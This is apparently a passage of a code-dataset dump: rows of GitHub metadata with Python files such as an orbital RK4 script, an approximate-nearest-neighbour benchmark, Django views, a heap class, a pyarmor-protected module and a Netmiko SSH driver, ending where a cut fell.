hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3c4027e0a85dd326115e24d1e6e1369d17bbdebc | 3,135 | py | Python | rh_project/pick_six.py | hrichstein/phys_50733 | a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | [
"MIT"
] | null | null | null | rh_project/pick_six.py | hrichstein/phys_50733 | a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | [
"MIT"
] | null | null | null | rh_project/pick_six.py | hrichstein/phys_50733 | a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
# def rk4_func(params):
# s1, s2, p, vs1, vs2, vp = params
# s1x, s1y = s1
# s2x, s2y = s2
# px, py = p
# # s1_vx, s1_vy = vs1
# # s2_vx, s2_vy = vs2
# # p_vx, p_vy = vp
# a1x = -G * red_mass * 0.1 / np.sqrt(0.1)**3
# a1y = -G * red_mass * 0 / np.sqrt(0.1)**3
# # R1px = abs(s1x - px)
# # R1py = abs(s1y - py)
# # R2px = abs(s2x - px)
# # R2py = abs(s2y - py)
# # R12x = abs(s1x - s2x)
# # R12y = abs(s1y - s2y)
# # R1p = np.sqrt((s1x - px)**2 + (s1y - py)*2)
# # R2p = np.sqrt((s2x - px)**2 + (s2y - py)*2)
# # R12 = A # global variable
# # a1_2x = -G * M1 * R12x / R12**3
# # a1_2y = -G * M1 * R12y / R12**3
# # a2_1x = -G * M2 * R12x
# Constants
G = 4 * np.pi**2 # AU^3 yr^-2 M_sun^-1
A = 0.2 # AU
r = A/2 # semi-major axis & radius
test_plan = 1 # AU
a = 0
b = .02
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
red_mass = M1*M2/(M1+M2)
tpoints = np.arange(a, b, h, dtype=int)
s1 = np.array([r, 0], float)
s2 = np.array([-r,0], float)
p = np.array([test_plan, 0], float)
s_vel = find_vel_init(M1, red_mass, r)
# s_vel = np.sqrt(10*G*red_mass)
p_vel = find_vel_init(red_mass, 0, test_plan)
print(s_vel)
s1_v0 = np.array([0, s_vel], float)
s2_v0 = np.array([0, -s_vel], float)
p_v0 = np.array([0, p_vel], float)
all_params = np.array([s1, s2, p, s1_v0, s2_v0, p_v0])
xpts_s1 = [[] for tt in range(len(tpoints))]
ypts_s1 = [[] for tt in range(len(tpoints))]
xpts_s2 = [[] for tt in range(len(tpoints))]
ypts_s2 = [[] for tt in range(len(tpoints))]
xpts_p = [[] for tt in range(len(tpoints))]
ypts_p = [[] for tt in range(len(tpoints))]
s_ghet = np.array([s1[0], s1[1], s1_v0[0], s1_v0[1]])
for tt in range(len(tpoints)):
xpts_s1[tt] = s_ghet[0]
ypts_s1[tt] = s_ghet[1]
k1 = h * ghetto(s_ghet)
k2 = h * ghetto(s_ghet + 0.5*k1)
k3 = h * ghetto(s_ghet + 0.5*k2)
k4 = h * ghetto(s_ghet + k3)
s_ghet += (k1 + 2*k2 + 2*k3 + k4) / 6
# print(s_ghet[0])
plt.plot(xpts_s1, ypts_s1)
plt.show()
# def f(s,t):
# x, y, vx, vy = s
# R = np.sqrt(x**2 + y**2)
# ax = (-GMsun * x )/R ** 3
# ay = (-GMsun * y )/R ** 3
# return np.array([vx, vy, ax, ay])
# r0 = np.array([r, 0.0], float)
# v0 = np.array([0, -s_vel], float)
# s = np.array([r0[0], r0[1], v0[0], v0[1]])
# for tt in :
# solution[j] = s
# k1 = h*f(s,t)
# k2 = h*f(s+0.5*k1,t+0.5*h)
# k3 = h*f(s+0.5*k2,t+0.5*h)
# k4 = h*f(s+k3,t+h)
# s += (k1+2*k2+2*k3+k4)/6 | 19.59375 | 71 | 0.551515 |
3c42036c78c029c70b9f27f5eeeede981c311ba5 | 1,704 | py | Python | recoda/analyse/python/metrics.py | hansendx/recoda | 09e25843376613b17c6b42d45e30b895b24a7d9d | [
"MIT"
] | null | null | null | recoda/analyse/python/metrics.py | hansendx/recoda | 09e25843376613b17c6b42d45e30b895b24a7d9d | [
"MIT"
] | null | null | null | recoda/analyse/python/metrics.py | hansendx/recoda | 09e25843376613b17c6b42d45e30b895b24a7d9d | [
"MIT"
] | null | null | null | """ Provides functionality to calculate software metrics in python projects.
"""
from recoda.analyse.python import (
_general,
_installability,
_understandability,
_verifiability,
_correctness,
)
from recoda.analyse.independent import (
learnability,
openness
)
# pylint: disable-msg=c0103
# For now this seems to be the most streamline method of decentralization
# of this module. We want to call all functions via the metrics but we do
# not want it to be too long and unreadable. Wrapping the private module
# functions into a barebones would just lead to a lot more unnecessary code.
# Installability related metrics.
#packageability = _installability.packageability
packageability = _installability.packageability
requirements_declared = _installability.requirements_declared
docker_setup = _installability.docker_setup
singularity_setup = _installability.singularity_setup
# Learnability related metrics.
project_readme_size = learnability.project_readme_size
project_doc_size = learnability.project_doc_size
flesch_reading_ease = learnability.flesch_reading_ease
flesch_kincaid_grade = learnability.flesch_kincaid_grade
readme_flesch_reading_ease = learnability.readme_flesch_reading_ease
readme_flesch_kincaid_grade = learnability.readme_flesch_kincaid_grade
# Understandability related metrics.
average_comment_density = _understandability.average_comment_density
standard_compliance = _understandability.standard_compliance
# Openness related metrics.
license_type = openness.license_type
testlibrary_usage = _verifiability.testlibrary_usage
# Correctness related metrics.
error_density = _correctness.error_density
# General
loc = _general.count_loc | 29.894737 | 76 | 0.834507 |
3c42183d7ca6ff665b6de8859306ffa82f1f09f2 | 1,667 | py | Python | legacy/functional_code/pulson440/__init__.py | jjimmykang/bwsi-backprojection | 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | [
"MIT"
] | 1 | 2020-02-09T19:09:27.000Z | 2020-02-09T19:09:27.000Z | legacy/functional_code/pulson440/__init__.py | jjimmykang/bwsi-backprojection | 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | [
"MIT"
] | null | null | null | legacy/functional_code/pulson440/__init__.py | jjimmykang/bwsi-backprojection | 440e21f90e2a1d0d1c28bfd9a0faaf97129378a5 | [
"MIT"
] | null | null | null | __pyarmor__(__name__, __file__, b'\xe2\x50\x8c\x64\x26\x42\xd6\x01\x5c\x5c\xf8\xa8\x85\x0c\x21\xe7\x0a\xa2\x45\x58\x6e\xc9\x3c\xd5\x55\x40\x64\x69\x7d\x5f\x63\xcb\x41\xdc\x71\xdf\x4d\x82\x99\xc8\xc1\x98\xfd\x46\x67\x20\x2f\xed\x4b\xf6\xf9\x41\x55\x5c\x47\x3c\x78\x07\x75\x5d\x9b\x88\xa2\x6e\x5e\x78\xf3\x9c\x88\xba\xed\x07\xab\xfe\x63\x70\x5d\x62\xc4\xbe\xfd\x5d\x4c\x32\x27\x59\x91\x67\x1e\xb0\x09\xec\x0b\x12\x11\x95\xce\xb2\xee\x37\xe2\x0e\x96\xb7\x83\x5e\x28\x3a\xde\x3f\xd7\xea\x21\x4b\xeb\x6e\x65\x36\x4c\x34\x8b\xd6\x28\x44\x50\x1e\xd0\xe8\x0b\xd9\x61\x73\x2c\xb2\x29\xf7\x42\xb4\x2e\x08\x97\x23\xd0\xd3\x76\xcf\xf0\xe9\xb7\x3c\x9e\xc4\x57\xc6\xab\x9f\xbb\xbb\x63\xc3\x80\xf3\x9d\x1e\x6d\x3c\xaf\x91\x80\x55\xbb\xc8\xa2\x26\x03\x92\xdd\x15\x99\x70\x84\xc0\xcd\x34\xcf\x1f\x23\xea\xba\xad\x7a\x1e\xe1\xb6\x93\xed\x61\xa7\xf2\x15\x58\x20\x19\x08\xca\x8c\x31\x89\x05\x52\x81\xde\xfa\x76\x9a\xa3\x91\x5b\x25\xb8\x2b\xd0\x4f\xfb\x4a\x92\x15\x71\x4f\x8e\xf2\x6e\xe8\xdb\x23\xb4\x9f\xee\x94\xd0\x7a\x58\xeb\x22\xb7\x25\x08\xac\x2e\xf9\xa1\x0c\x37\xc5\xe8\x58\xe6\x26\xaf\x21\xce\x28\x4c\xdf\x09\xdc\xf8\xd7\x78\xe5\xc2\xb7\x32\x78\x09\x03\xf7\x28\x4f\x25\xc6\xe8\x87\x28\xef\x7a\x84\x1b\x88\x23\x5d\xf4\x6c\xf4\x0c\xa2\x02\x3b\x2e\x56\x30\xcd\x24\xff\x8f\xb8\xb0\x7c\x7c\x2e\x84\x60\x13\x25\xfe\xcc\x1b\x2d\xa3\xe1\xe2\x45\xff\x3f\x0b\xfe\xca\x49\x50\xbd\x3d\x64\x8e\xb5\xe9\x62\xcf\xaf\xb7\x99\x80\x7a\xfc\xdf\x31\x65\xf1\x24\xd9\xec\x50\xd9\x7f\xd0\xf6\x4a\xcd\xfc\x3d\x7e\xfd\xf8\x3c\xd5\x16\xfe\x8a\x68\xb7\xf3\xf2\x13\x1d\xa9\x91\x9a\x51\x8e\xc0\xa5\x81\x04\xd6\x08\x90\xf1\xcd\x69\x01\x2b\xd5\x29\xe3\x4e\x7b\x16\x4a\xf6\x61\xd8\x1f\xde\x87\xb2\x40\x8d\x68', 1) | 1,667 | 1,667 | 0.74985 |
3c43222bbb55fdc6b4f2d6c2fab0d2b77fcb11ea | 3,278 | py | Python | metarmap/commands/display.py | wastrachan/metarmap | 2ff9bc3e94d731b83470c2283bfb67600143d719 | [
"MIT"
] | null | null | null | metarmap/commands/display.py | wastrachan/metarmap | 2ff9bc3e94d731b83470c2283bfb67600143d719 | [
"MIT"
] | null | null | null | metarmap/commands/display.py | wastrachan/metarmap | 2ff9bc3e94d731b83470c2283bfb67600143d719 | [
"MIT"
] | null | null | null | import datetime
import os
import textwrap
import click
from PIL import Image, ImageDraw, ImageFont
from metarmap.configuration import config, debug, get_display_lock_content, set_display_lock_content
from metarmap.libraries.aviationweather import metar
from metarmap.libraries.waveshare_epd import epd2in13_V2
FONTDIR = os.path.abspath('/usr/share/fonts/truetype/freefont/')
FONT = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 13)
FONT_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 13)
FONT_TITLE = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 15)
FONT_TITLE_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 15)
| 38.116279 | 106 | 0.701647 |
3c4462f1e63b1c59a4923c8fbfbe9795c85ccd1c | 3,234 | py | Python | electionleaflets/apps/leaflets/views.py | electionleaflets/electionleaflets | 4110e96a3035c32d0b6ff3c9f832c5e003728170 | [
"MIT"
] | null | null | null | electionleaflets/apps/leaflets/views.py | electionleaflets/electionleaflets | 4110e96a3035c32d0b6ff3c9f832c5e003728170 | [
"MIT"
] | 23 | 2015-02-19T14:02:23.000Z | 2015-04-30T11:14:01.000Z | electionleaflets/apps/leaflets/views.py | electionleaflets/electionleaflets | 4110e96a3035c32d0b6ff3c9f832c5e003728170 | [
"MIT"
] | 2 | 2015-02-02T19:39:54.000Z | 2017-02-08T09:19:53.000Z | import os
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.contrib.formtools.wizard.views import NamedUrlSessionWizardView
from django.core.urlresolvers import reverse
from django.conf import settings
from django.views.generic import DetailView, ListView, DetailView
from django.core.files.storage import FileSystemStorage
from .models import Leaflet, LeafletImage
# def view_full_image(request, image_key):
#
# li = LeafletImage.objects.filter(pk=image_key)
# if li.count() == 1:
# li = get_object_or_404(LeafletImage, image_key=image_key)
# else:
# # Should not do this, we'll need to fix it
# # probably and upload artifact
# li = li.all()[0]
#
# return render_to_response('leaflets/full.html',
# {
# 'image': li,
# 'leaflet': li.leaflet,
# },
# context_instance=RequestContext(request), )
def view_all_full_images(request, leafletid):
from leaflets.models import Leaflet, LeafletImage
leaflet = get_object_or_404(Leaflet, pk=leafletid)
images = LeafletImage.objects.filter(leaflet=leaflet)
return render_to_response('leaflets/full_all.html',
{
'images': images,
'leaflet': leaflet,
},
context_instance=RequestContext(request), )
| 33.6875 | 79 | 0.629252 |
3c44954b74ac962e577c29775c64025c256cc805 | 3,409 | py | Python | Heap/heap.py | jeremy2918/data-structures | 17685212aac38979929ca923eb2f9b989c74d07a | [
"MIT"
] | 1 | 2021-12-14T19:57:28.000Z | 2021-12-14T19:57:28.000Z | Heap/heap.py | jeremy2918/data-structures | 17685212aac38979929ca923eb2f9b989c74d07a | [
"MIT"
] | null | null | null | Heap/heap.py | jeremy2918/data-structures | 17685212aac38979929ca923eb2f9b989c74d07a | [
"MIT"
] | null | null | null | # Min Heap Implementation
| 29.387931 | 78 | 0.566442 |
3c460fdfda615228be90ea72ed8b2f5c151649c7 | 16,921 | py | Python | benchmarks/benchmark_script.py | oddconcepts/n2o | fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | [
"Apache-2.0"
] | 2 | 2019-02-13T12:59:27.000Z | 2020-01-28T02:02:47.000Z | benchmarks/benchmark_script.py | oddconcepts/n2o | fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | [
"Apache-2.0"
] | 2 | 2019-06-25T10:00:57.000Z | 2019-10-26T14:55:23.000Z | benchmarks/benchmark_script.py | oddconcepts/n2o | fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | [
"Apache-2.0"
] | 1 | 2021-11-03T14:59:27.000Z | 2021-11-03T14:59:27.000Z | # This code is based on the code
# from ann-benchmark repository
# created by Erik Bernhardsson
# https://github.com/erikbern/ann-benchmarks
import gzip
import numpy
import time
import os
import multiprocessing
import argparse
import pickle
import resource
import random
import math
import logging
import shutil
import subprocess
import sys
import tarfile
from contextlib import closing
try:
xrange
except NameError:
xrange = range
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
from n2 import HnswIndex
n2_logger = logging.getLogger("n2_benchmark")
n2_logger.setLevel(logging.INFO)
# Set resource limits to prevent memory bombs
memory_limit = 12 * 2**30
soft, hard = resource.getrlimit(resource.RLIMIT_DATA)
if soft == resource.RLIM_INFINITY or soft >= memory_limit:
n2_logger.info('resetting memory limit from {0} to {1}. '.format(soft, memory_limit))
resource.setrlimit(resource.RLIMIT_DATA, (memory_limit, hard))
INDEX_DIR='indices'
DATA_DIR = './datasets/'
GLOVE_DIR = DATA_DIR + 'glove.txt'
SIFT_DIR = DATA_DIR + 'sift.txt'
YOUTUBE_DIR = DATA_DIR + 'youtube.txt'
def run_algo(args, library, algo, results_fn):
pool = multiprocessing.Pool()
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state = args.random_state)
pool.close()
pool.join()
t0 = time.time()
algo.fit(X_train)
build_time = time.time() - t0
n2_logger.info('Built index in {0}'.format(build_time))
best_search_time = float('inf')
best_precision = 0.0 # should be deterministic but paranoid
try_count = args.try_count
for i in xrange(try_count): # Do multiple times to warm up page cache, use fastest
results = []
search_time = 0.0
current_query = 1
total_queries = len(queries)
for j in range(total_queries):
v, correct = queries[j]
sys.stdout.write("Querying: %d / %d \r" % (current_query, total_queries))
t0 = time.time()
found = algo.query(v, GT_SIZE)
search_time += (time.time() - t0)
if len(found) < len(correct):
n2_logger.info('found: {0}, correct: {1}'.format(len(found), len(correct)))
current_query += 1
results.append(len(set(found).intersection(correct)))
k = float(sum(results))
search_time /= len(queries)
precision = k / (len(queries) * GT_SIZE)
best_search_time = min(best_search_time, search_time)
best_precision = max(best_precision, precision)
sys.stdout.write('*[%d/%d][algo: %s] search time: %s, precision: %.5f \r' % (i+1, try_count, str(algo), str(search_time), precision))
sys.stdout.write('\n')
output = [library, algo.name, build_time, best_search_time, best_precision]
n2_logger.info(str(output))
f = open(results_fn, 'a')
f.write('\t'.join(map(str, output)) + '\n')
f.close()
n2_logger.info('Summary: {0}'.format('\t'.join(map(str, output))))
def get_dataset(which='glove', data_size=-1, test_size = 10000, random_state = 3):
cache = 'queries/%s-%d-%d-%d.npz' % (which, max(args.data_size, 0), test_size, random_state)
if os.path.exists(cache):
v = numpy.load(cache)
X_train = v['train']
X_test = v['test']
n2_logger.info('{0} {1}'.format(X_train.shape, X_test.shape))
return X_train, X_test
local_fn = os.path.join('datasets', which)
if os.path.exists(local_fn + '.gz'):
f = gzip.open(local_fn + '.gz')
else:
f = open(local_fn + '.txt')
X = []
for i, line in enumerate(f):
v = [float(x) for x in line.strip().split()]
X.append(v)
if data_size != -1 and len(X) == data_size:
break
X = numpy.vstack(X)
import sklearn.cross_validation
# Here Erik is most welcome to use any other random_state
# However, it is best to use a new random seed for each major re-evaluation,
# so that we test on a trully bind data.
X_train, X_test = sklearn.cross_validation.train_test_split(X, test_size=test_size, random_state=random_state)
X_train = X_train.astype(numpy.float)
X_test = X_test.astype(numpy.float)
numpy.savez(cache, train=X_train, test=X_test)
return X_train, X_test
def get_queries(args):
n2_logger.info('computing queries with correct results...')
bf = BruteForceBLAS(args.distance)
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state=args.random_state)
# Prepare queries
bf.fit(X_train)
queries = []
total_queries = len(X_test)
for x in X_test:
correct = bf.query(x, GT_SIZE)
queries.append((x, correct))
sys.stdout.write('computing queries %d/%d ...\r' % (len(queries), total_queries))
sys.stdout.write('\n')
return queries
def get_fn(base, args):
fn = os.path.join(base, args.dataset)
if args.data_size != -1:
fn += '-%d' % args.data_size
if args.test_size != -1:
fn += '-%d' % args.test_size
fn += '-%d' % args.random_state
if os.path.exists(fn + '.gz'):
fn += '.gz'
else:
fn += '.txt'
d = os.path.dirname(fn)
if not os.path.exists(d):
os.makedirs(d)
return fn
def download_file(url, dst):
file_name = url.split('/')[-1]
with closing(urlopen(url)) as res:
with open(dst+"/"+file_name, 'wb') as f:
file_size = int(res.headers["Content-Length"])
sys.stdout.write("Downloading datasets %s\r" % (file_name))
file_size_dl = 0
block_sz = 10240
while True:
buffer = res.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
sys.stdout.write("Downloading datasets %s: %d / %d bytes\r" % (file_name, file_size_dl, file_size))
sys.stdout.write('\n')
if __name__ == '__main__':
global GT_SIZE
parser = argparse.ArgumentParser()
parser.add_argument('--distance', help='Distance metric', default='angular')
parser.add_argument('--try_count', help='Number of test attempts', type=int, default=3)
parser.add_argument('--dataset', help='Which dataset', default='glove')
parser.add_argument('--data_size', help='Maximum # of data points', type=int, default=-1)
parser.add_argument('--test_size', help='Maximum # of data queries', type=int, default=10000)
parser.add_argument('--n_threads', help='Number of threads', type=int, default=10)
parser.add_argument('--random_state', help='Random seed', type=int, default=3)
parser.add_argument('--algo', help='Algorithm', type=str)
args = parser.parse_args()
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
numpy.random.seed(args.random_state)
if args.dataset == 'glove':
GT_SIZE = 10
elif args.dataset == 'sift':
GT_SIZE = 10
elif args.dataset == 'youtube':
GT_SIZE = 100
else:
print('Invalid dataset: {}'.format(args.dataset))
exit(0)
print('* GT size: {}'.format(GT_SIZE))
if args.dataset == 'glove' and not os.path.exists(GLOVE_DIR):
download_file("https://s3-us-west-1.amazonaws.com/annoy-vectors/glove.twitter.27B.100d.txt.gz", "datasets")
with gzip.open('datasets/glove.twitter.27B.100d.txt.gz', 'rb') as f_in, open('datasets/glove.twitter.27B.100d.txt', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
subprocess.call("cut -d \" \" -f 2- datasets/glove.twitter.27B.100d.txt > datasets/glove.txt", shell=True)
if args.dataset == 'sift' and not os.path.exists(SIFT_DIR):
download_file("ftp://ftp.irisa.fr/local/texmex/corpus/sift.tar.gz", "datasets")
with tarfile.open("datasets/sift.tar.gz") as t:
t.extractall(path="datasets")
subprocess.call("python datasets/convert_texmex_fvec.py datasets/sift/sift_base.fvecs >> datasets/sift.txt", shell=True)
if args.dataset == 'youtube' and not os.path.exists(YOUTUBE_DIR):
raise IOError('Please follow the instructions in the guide to download the YouTube dataset.')
results_fn = get_fn('results', args)
queries_fn = get_fn('queries', args)
logging.info('storing queries in {0} and results in {1}.'.format(queries_fn, results_fn))
if not os.path.exists(queries_fn):
queries = get_queries(args)
with open(queries_fn, 'wb') as f:
pickle.dump(queries, f)
else:
queries = pickle.load(open(queries_fn, 'rb'))
logging.info('got {0} queries'.format(len(queries)))
algos = {
'annoy': [ Annoy('angular', n_trees, search_k)
for n_trees in [10, 50, 100]
for search_k in [ 7, 3000, 50000, 200000, 500000]
],
'n2': [ N2(M, ef_con, args.n_threads, ef_search, 'angular')
for M, ef_con in [ (12, 100)]
for ef_search in [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2500, 5000, 10000, 100000]
],
'nmslib': []}
MsPostsEfs = [
({'M': 12,
'post': 0,
'indexThreadQty': args.n_threads,
'delaunay_type': 2,
'efConstruction': 100,
},
[1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2000, 2500],
),
]
for oneCase in MsPostsEfs:
for ef in oneCase[1]:
params = ['%s=%s' % (k, str(v)) for k, v in oneCase[0].items()]
algos['nmslib'].append(
NmslibReuseIndex( 'angular', 'hnsw', params, True, ['ef=%d' % ef]))
algos_flat = []
if args.algo:
print('running only: %s' % str(args.algo))
algos = {args.algo: algos[args.algo]}
for library in algos.keys():
for algo in algos[library]:
algos_flat.append((library, algo))
random.shuffle(algos_flat)
logging.debug('order: %s' % str([a.name for l, a in algos_flat]))
for library, algo in algos_flat:
logging.info(algo.name)
# Spawn a subprocess to force the memory to be reclaimed at the end
p = multiprocessing.Process(target=run_algo, args=(args, library, algo, results_fn))
p.start()
p.join()
| 37.602222 | 166 | 0.61929 |
3c48c2125ebec3cfbc2f8abe3432087a8f247884 | 28 | py | Python | ars/__init__.py | david-lindner/ARS | acfe403ebe90c157d61690a9498597244853fc78 | [
"BSD-2-Clause"
] | null | null | null | ars/__init__.py | david-lindner/ARS | acfe403ebe90c157d61690a9498597244853fc78 | [
"BSD-2-Clause"
] | null | null | null | ars/__init__.py | david-lindner/ARS | acfe403ebe90c157d61690a9498597244853fc78 | [
"BSD-2-Clause"
] | null | null | null | from .ars import ARSLearner
| 14 | 27 | 0.821429 |
3c4c370cfd780bfee437676b79c4d199589eb48b | 618 | py | Python | setup.py | elaru/python3-cre | 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | [
"0BSD"
] | null | null | null | setup.py | elaru/python3-cre | 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | [
"0BSD"
] | null | null | null | setup.py | elaru/python3-cre | 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | [
"0BSD"
] | null | null | null | from setuptools import setup
setup(
name="cre",
packages=["cre"],
version="0.1.0",
author="Philipp Schiffmann",
author_email="philippschiffmann@icloud.com",
url="https://github.com/elaru/python3-cre",
description="A regular expression processor implemented in python.",
license="ISC",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: ISC License (ISCL)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3"
]
)
| 28.090909 | 69 | 0.676375 |
3c4ce0be200904020cc2f4b6271e9daccb20ccb2 | 284 | py | Python | bin/const.py | Novartole/Video-pixels | 10246d1953289e1cded43ed63104f5343a3d9e65 | [
"MIT"
] | null | null | null | bin/const.py | Novartole/Video-pixels | 10246d1953289e1cded43ed63104f5343a3d9e65 | [
"MIT"
] | null | null | null | bin/const.py | Novartole/Video-pixels | 10246d1953289e1cded43ed63104f5343a3d9e65 | [
"MIT"
] | null | null | null | import enum
DEFAULT_FILE_NAME = 'DEFAULT'
RANDOM_MIX_CONFIG_NAME = 'RandomMix'
WIDTH_NAME = 'Width'
HIGHT_NAME = 'Hight' | 20.285714 | 61 | 0.760563 |
3c4dca815ed01033d3b7eadeef2709708a553018 | 1,902 | py | Python | src/nr/util/orderedset.py | NiklasRosenstein/python-nr.util | 087f2410d38006c1005a5fb330c47a56bcdb2279 | [
"MIT"
] | null | null | null | src/nr/util/orderedset.py | NiklasRosenstein/python-nr.util | 087f2410d38006c1005a5fb330c47a56bcdb2279 | [
"MIT"
] | 3 | 2022-02-16T13:17:28.000Z | 2022-03-14T15:28:41.000Z | src/nr/util/orderedset.py | NiklasRosenstein/python-nr.util | 087f2410d38006c1005a5fb330c47a56bcdb2279 | [
"MIT"
] | null | null | null |
import collections
import functools
import typing as t
from nr.util.generic import T
T_OrderedSet = t.TypeVar('T_OrderedSet', bound='OrderedSet')
| 26.788732 | 73 | 0.656677 |
3c4ddc1c01b18295d9fb2f58c8e9a33ac6c57830 | 1,812 | py | Python | applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | mith1979/ansible_automation | 013dfa67c6d91720b787fadb21de574b6e023a26 | [
"Apache-2.0"
] | null | null | null | applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | mith1979/ansible_automation | 013dfa67c6d91720b787fadb21de574b6e023a26 | [
"Apache-2.0"
] | null | null | null | applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | mith1979/ansible_automation | 013dfa67c6d91720b787fadb21de574b6e023a26 | [
"Apache-2.0"
] | null | null | null | import re
from netmiko.ssh_connection import SSHConnection
| 42.139535 | 93 | 0.657837 |
3c51be6bea74f985c0302d56a6e42f0067e94f0f | 4,287 | py | Python | K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | cultural-ai/ConConCor | f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | [
"CC-BY-2.0"
] | 1 | 2021-12-14T10:19:55.000Z | 2021-12-14T10:19:55.000Z | K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | cultural-ai/ConConCor | f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | [
"CC-BY-2.0"
] | null | null | null | K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | cultural-ai/ConConCor | f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | [
"CC-BY-2.0"
] | null | null | null | """{Build token: cluster index}, hashes for each specified granularity level in the user-defined list 'clustering_levels_to_consider'
Output: level_xx_hash.json hash to /cluster_hashes
"""
import json
import os
import pickle as pkl
import typing
import numpy as np
def cluster_index_to_tokens(cluster_index: int, *, z: np.ndarray, tokens: list) -> list:
"""Return a list of tokens corresponding to a cluster index (as per z[:, 0:2]) values."""
if cluster_index < len(tokens):
return [tokens[cluster_index]]
else:
c1, c2 = z[cluster_index - len(tokens), 0:2].astype(int)
return cluster_index_to_tokens(
c1, z=z, tokens=tokens
) + cluster_index_to_tokens(c2, z=z, tokens=tokens)
if __name__ == "__main__":
main()
| 37.278261 | 148 | 0.648239 |
3c529f808ec5b62668f3e070b0cf33366833814f | 3,434 | py | Python | cerebralcortex/core/datatypes/datapoint.py | hippietilley/CerebralCortex-Kernel | c7dac033d9561f14bdb72430577db6ae4e3c7911 | [
"BSD-2-Clause"
] | null | null | null | cerebralcortex/core/datatypes/datapoint.py | hippietilley/CerebralCortex-Kernel | c7dac033d9561f14bdb72430577db6ae4e3c7911 | [
"BSD-2-Clause"
] | null | null | null | cerebralcortex/core/datatypes/datapoint.py | hippietilley/CerebralCortex-Kernel | c7dac033d9561f14bdb72430577db6ae4e3c7911 | [
"BSD-2-Clause"
] | null | null | null | # Copyright (c) 2018, MD2K Center of Excellence
# - Nasir Ali <nasir.ali08@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
